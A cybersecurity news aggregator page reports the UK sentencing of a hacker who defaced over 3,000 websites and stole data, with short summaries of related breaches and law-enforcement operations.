CyberHappenings logo
🏠 Home 📂 Browse ℹ️ About

UK Sentences Serial Hacker of 3,000 Sites to 20 Months in Prison

First reported
Last updated
📰 2 unique sources, 2 articles

Summary

Hide ▲

A 26-year-old UK resident, Al-Tahery Al-Mashriky, was sentenced to 20 months in prison for hacking over 3,000 websites, including government and news sites in Yemen, Israel, the U.S., and Canada. The hacker, linked to extremist groups, stole personal data from millions of Facebook users and defaced sites to post political messages. Al-Mashriky was arrested in August 2022 based on information from U.S. law enforcement and pleaded guilty to nine charges under the Computer Misuse Act in March 2025. The hacker's activities caused significant disruption to targeted organizations and users. The hacker's actions were motivated by political and ideological views, and he possessed stolen data that could have enabled further fraudulent activities. The Yemen Cyber Army, a hacktivist group supporting the Houthis, was identified as one of the groups Al-Mashriky was affiliated with. The group primarily aims to spread political messages through defacing websites and leaking data while targeting media outlets and government agencies.

Timeline

  1. 18.08.2025 19:36 📰 2 articles

    UK Sentences Serial Hacker of 3,000 Sites to 20 Months in Prison

    A 26-year-old UK resident, Al-Tahery Al-Mashriky, was sentenced to 20 months in prison for hacking over 3,000 websites, including government and news sites in Yemen, Israel, the U.S., and Canada. The hacker, linked to extremist groups, stole personal data from millions of Facebook users and defaced sites to post political messages. Al-Mashriky was arrested in August 2022 based on information from U.S. law enforcement and pleaded guilty to nine charges under the Computer Misuse Act in March 2025. The hacker's activities caused significant disruption to targeted organizations and users. The hacker's actions were motivated by political and ideological views, and he possessed stolen data that could have enabled further fraudulent activities. The Yemen Cyber Army, a hacktivist group supporting the Houthis, was identified as one of the groups Al-Mashriky was affiliated with. The group primarily aims to spread political messages through defacing websites and leaking data while targeting media outlets and government agencies.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Salesloft OAuth breach exposes Salesforce customer data via Drift AI chat agent

A threat actor, UNC6395, exploited OAuth tokens associated with the Drift AI chat agent to breach Salesloft and access customer data across multiple integrations, including Salesforce, Google Workspace, and others. The breach occurred between August 8 and 18, 2025, affecting over 700 organizations, including Zscaler, Palo Alto Networks, Cloudflare, Google Workspace, PagerDuty, Proofpoint, SpyCloud, and Tanium. The attackers targeted Salesforce instances and accessed email from a small number of Google Workspace accounts, exporting large volumes of data, including credentials and access tokens. Salesloft and Salesforce have taken steps to mitigate the breach and are advising affected customers to revoke API keys and rotate credentials. Salesloft will temporarily take Drift offline to enhance security. UNC6395 demonstrated operational security awareness by deleting query jobs, indicating a sophisticated approach. The breach highlights the risks of third-party integrations and the potential for supply chain attacks. The breach is unrelated to previous vishing attacks attributed to ShinyHunters. UNC6395 systematically exported large volumes of data from numerous corporate Salesforce instances, searching for secrets that could be used to compromise victim environments. The campaign is not limited to Salesforce customers who integrate their own solutions with the Salesforce service; it impacts all integrations using Salesloft Drift. There is no evidence that the breaches directly impacted Google Cloud customers. Organizations are urged to review all third-party integrations connected to their Drift instance, revoke and rotate credentials for those applications, and investigate all connected systems for signs of unauthorized access. The blast radius of the Salesloft Drift attacks remains uncertain, with the ultimate scope and severity still unclear. Numerous companies have disclosed downstream breaches resulting from this campaign, including Zscaler, Palo Alto Networks, Proofpoint, Cloudflare, and Tenable. Zscaler and Palo Alto Networks warned of potential social engineering attacks resulting from the campaign. Cloudflare confirmed that some customer support interactions may reveal information about a customer's configuration and could contain sensitive information like access tokens. Okta successfully prevented a breach of its Salesforce instance by enforcing inbound IP restrictions, securing tokens with DPoP, and using the IPSIE framework. Okta recommends that organizations demand IPSIE integration from application vendors and implement an identity security fabric unified across applications. Palo Alto Networks' Unit 42 recommends conducting an immediate log review for signs of compromise and rotating exposed credentials. The breach started with the compromise of Salesloft's GitHub account between March and June 2025. UNC6395 accessed the Salesloft GitHub account and downloaded content from multiple repositories, added a guest user, and established workflows. Reconnaissance activities occurred between March 2025 and June 2025 in the Salesloft and Drift application environments. Salesloft isolated the Drift infrastructure, application, and code, and took the application offline on September 5, 2025. Salesloft rotated credentials in the Salesloft environment and hardened the environment with improved segmentation controls between Salesloft and Drift applications. Salesforce restored the integration with the Salesloft platform on September 7, 2025, but Drift remains disabled. 22 companies have confirmed they were impacted by the supply chain breach. ShinyHunters and Scattered Spider were also involved in the Salesloft Drift attacks.

Open in new tab

Data breach at Auchan exposes sensitive information of hundreds of thousands of customers

French retailer Auchan experienced a cyberattack that exposed sensitive personal data of several hundred thousand customers. The compromised data includes full names, titles, postal addresses, email addresses, phone numbers, and loyalty card numbers. The breach did not affect bank data, passwords, or PIN numbers. The company has notified affected customers and the French Data Protection Authority (CNIL). Auchan has advised customers to be vigilant against potential phishing attacks using the stolen information. The incident follows similar breaches at other large French entities, but no evidence links these attacks to a coordinated campaign. This is the second data breach that Auchan has disclosed over the past year. The company sent the same notification to its customers in November 2024.

Open in new tab

APT36 Linux .desktop File Abuse for Malware Delivery in Ongoing Espionage Campaign

APT36, a Pakistani cyber espionage group, is actively exploiting Linux .desktop files to deliver malware in attacks targeting government and defense entities in India. The campaign, which began on August 1, 2025, uses phishing emails to distribute ZIP archives containing malicious .desktop files disguised as PDFs. These files execute a payload that establishes persistent access and exfiltrates data. The attack leverages the 'Exec=' field in .desktop files to run shell commands, fetching and executing a hex-encoded payload from attacker-controlled servers or Google Drive. The payload is a Go-based ELF executable designed for espionage, capable of maintaining stealth and setting up persistence through cron jobs and systemd services. Communication with the command and control (C2) server is conducted over a bi-directional WebSocket channel. APT36 has also been observed targeting Windows and BOSS Linux systems, using spoofed domains and infrastructure hosted on Pakistan-based servers to steal credentials and 2FA codes.

Open in new tab

Operation Serengeti 2.0: INTERPOL-led Cybercrime Crackdown in Africa

Operation Serengeti 2.0, an INTERPOL-led international operation, resulted in the arrest of 1,209 cybercriminals across Africa and the UK. The operation targeted high-harm and high-impact cybercrimes, including ransomware, online scams, and business email compromise (BEC). Between June and August 2025, law enforcement seized $97.4 million and dismantled 11,432 malicious infrastructures linked to attacks on 87,858 victims worldwide. The operation involved investigators from 18 African countries and the UK, and utilized data from multiple private sector partners. Significant actions included the dismantling of 25 cryptocurrency mining centres in Angola, an online investment fraud operation in Zambia, and a transnational inheritance scam originating in Germany. Additionally, 45 illegal power stations and $37 million worth of mining and IT equipment were confiscated. A human trafficking network was also disrupted in Zambia. The operation also targeted a gang behind $300 million in investment fraud and a syndicate of Chinese nationals illegally mining cryptocurrency.

Open in new tab